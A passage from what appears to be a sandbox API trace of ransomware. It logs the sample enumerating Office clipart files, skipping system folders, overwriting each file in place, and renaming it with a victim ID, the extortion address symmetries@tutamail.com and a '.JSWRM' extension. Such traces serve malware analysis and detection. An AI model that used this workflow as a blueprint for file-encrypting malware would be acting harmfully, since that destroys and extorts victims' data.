HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.804] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00272_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00272_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00272_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00272_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0092.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0092.805] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5aa4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00468_.WMF", cAlternateFileName="")) returned 1 [0092.805] lstrcmpiW (lpString1="PE00468_.WMF", lpString2=".") returned 1 [0092.805] lstrcmpiW (lpString1="PE00468_.WMF", lpString2="..") returned 1 [0092.805] lstrcmpiW (lpString1="PE00468_.WMF", lpString2="...") returned 1 [0092.805] lstrcmpiW (lpString1="PE00468_.WMF", lpString2="windows") returned -1 [0092.805] lstrcmpiW (lpString1="PE00468_.WMF", lpString2="recovery") returned -1 [0092.805] lstrcmpiW (lpString1="PE00468_.WMF", lpString2="perflogs") returned -1 [0092.805] lstrcmpiW (lpString1="PE00468_.WMF", lpString2="documents and settings") returned 1 [0092.806] lstrcmpiW (lpString1="PE00468_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.806] lstrcmpiW (lpString1="PE00468_.WMF", lpString2="system volume information") returned -1 [0092.806] lstrcmpiW (lpString1="PE00468_.WMF", lpString2="msocache") returned 1 [0092.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00468_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00468_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00468_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0092.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00468_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00468_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00468_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0092.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0092.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00468_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00468_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.806] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23204) returned 1 [0092.806] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5aa0) returned 0x24d210 [0092.807] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5aa0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5aa0, lpOverlapped=0x0) returned 1 [0092.810] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.810] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5aa0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5aa0, lpOverlapped=0x0) returned 1 [0092.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.810] CloseHandle (hObject=0x314) returned 1 [0092.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0092.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0092.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0092.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0092.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0092.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0092.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.811] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00468_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00468_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00468_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00468_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0092.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0092.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.811] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10149fbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1cf8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00478_.WMF", cAlternateFileName="")) returned 1 [0092.812] lstrcmpiW (lpString1="PE00478_.WMF", lpString2=".") returned 1 [0092.812] lstrcmpiW (lpString1="PE00478_.WMF", lpString2="..") returned 1 [0092.812] lstrcmpiW (lpString1="PE00478_.WMF", lpString2="...") returned 1 [0092.812] lstrcmpiW (lpString1="PE00478_.WMF", lpString2="windows") returned -1 [0092.812] lstrcmpiW (lpString1="PE00478_.WMF", lpString2="recovery") returned -1 [0092.812] lstrcmpiW (lpString1="PE00478_.WMF", lpString2="perflogs") returned -1 [0092.812] lstrcmpiW (lpString1="PE00478_.WMF", lpString2="documents and settings") returned 1 [0092.812] lstrcmpiW (lpString1="PE00478_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.812] lstrcmpiW (lpString1="PE00478_.WMF", lpString2="system volume information") returned -1 [0092.812] lstrcmpiW (lpString1="PE00478_.WMF", lpString2="msocache") returned 1 [0092.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0092.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00478_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00478_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00478_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0092.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0092.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00478_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00478_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00478_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0092.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0092.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00478_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00478_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.813] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7416) returned 1 [0092.813] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1cf0) returned 0x205850 [0092.813] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1cf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1cf0, lpOverlapped=0x0) returned 1 [0092.816] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.816] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1cf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1cf0, lpOverlapped=0x0) returned 1 [0092.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.816] CloseHandle (hObject=0x314) returned 1 [0092.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0092.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0092.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0092.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0092.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0092.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0092.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.817] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00478_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00478_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00478_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00478_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0092.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0092.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.818] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4124, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00485_.WMF", cAlternateFileName="")) returned 1 [0092.818] lstrcmpiW (lpString1="PE00485_.WMF", lpString2=".") returned 1 [0092.818] lstrcmpiW (lpString1="PE00485_.WMF", lpString2="..") returned 1 [0092.818] lstrcmpiW (lpString1="PE00485_.WMF", lpString2="...") returned 1 [0092.818] lstrcmpiW (lpString1="PE00485_.WMF", lpString2="windows") returned -1 [0092.818] lstrcmpiW (lpString1="PE00485_.WMF", lpString2="recovery") returned -1 [0092.818] lstrcmpiW (lpString1="PE00485_.WMF", lpString2="perflogs") returned -1 [0092.818] lstrcmpiW (lpString1="PE00485_.WMF", lpString2="documents and settings") returned 1 [0092.818] lstrcmpiW (lpString1="PE00485_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.818] lstrcmpiW (lpString1="PE00485_.WMF", lpString2="system volume information") returned -1 [0092.818] lstrcmpiW (lpString1="PE00485_.WMF", lpString2="msocache") returned 1 [0092.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0092.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00485_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00485_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00485_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0092.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0092.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00485_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00485_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00485_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0092.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0092.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00485_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00485_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.819] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16676) returned 1 [0092.819] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4120) returned 0x24d210 [0092.819] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4120, lpOverlapped=0x0) returned 1 [0092.821] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.821] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4120, lpOverlapped=0x0) returned 1 [0092.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.822] CloseHandle (hObject=0x314) returned 1 [0092.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0092.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0092.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0092.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0092.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0092.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0092.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.822] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00485_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00485_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00485_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00485_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0092.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0092.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0092.823] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1402c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00489_.WMF", cAlternateFileName="")) returned 1 [0092.823] lstrcmpiW (lpString1="PE00489_.WMF", lpString2=".") returned 1 [0092.823] lstrcmpiW (lpString1="PE00489_.WMF", lpString2="..") returned 1 [0092.823] lstrcmpiW (lpString1="PE00489_.WMF", lpString2="...") returned 1 [0092.823] lstrcmpiW (lpString1="PE00489_.WMF", lpString2="windows") returned -1 [0092.823] lstrcmpiW (lpString1="PE00489_.WMF", lpString2="recovery") returned -1 [0092.823] lstrcmpiW (lpString1="PE00489_.WMF", lpString2="perflogs") returned -1 [0092.823] lstrcmpiW (lpString1="PE00489_.WMF", lpString2="documents and settings") returned 1 [0092.823] lstrcmpiW (lpString1="PE00489_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.823] 